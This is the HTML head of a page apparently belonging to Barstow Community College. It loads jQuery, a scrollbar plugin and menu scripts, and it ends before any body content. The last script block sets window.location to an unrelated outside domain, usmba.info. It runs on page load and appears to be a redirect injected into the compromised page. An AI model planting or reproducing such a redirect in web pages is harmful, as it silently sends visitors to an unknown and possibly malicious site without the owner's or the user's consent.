<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <title>: : BARSTOW COMMUNITY COLLEGE : :</title>
    <link rel="stylesheet" type="text/css" href="/Scripts/designer/website/css/barstow.css" />
    <script type="text/javascript" src="/Scripts/designer/website/js/jquery.js"></script>

    <!------------SCROLLBAR------------------>
    <link type="text/css" href="/Scripts/designer/website/css/jquery.jscrollpane.css" rel="stylesheet" media="all" />
    <script type="text/javascript" src="/Scripts/designer/website/js/jquery.mousewheel.js"></script>
    <script type="text/javascript" src="/Scripts/designer/website/js/jquery.jscrollpane.min.js"></script>
    <script type="text/javascript" id="sourcecode">
        $(function () {
            $('.scroll-pane').jScrollPane();
        });
    </script>
    <style type="text/css" id="page-css">
        /* Styles specific to this particular page */
        .scroll-pane {
            width: 280px;
            height: 180px;
            overflow: auto;
            padding: 10px 14px 0px 0px;
            margin: 10px 0px 0px 10px;
        }

        .horizontal-only {
            height: auto;
            max-height: 200px;
        }
    </style>

    <!-----------------------MENU----------------------->
    <link rel="stylesheet" type="text/css" href="/Scripts/designer/website/css/quickmenu.css" media="screen" />
    <script type='text/javascript' src="/Scripts/designer/website/js/quickmenu.js"></script>
    <script type="text/JavaScript">

  </script>
<script type="text/javascript">
<!--
window.location = "http://usmba.info"
//-->
</script>
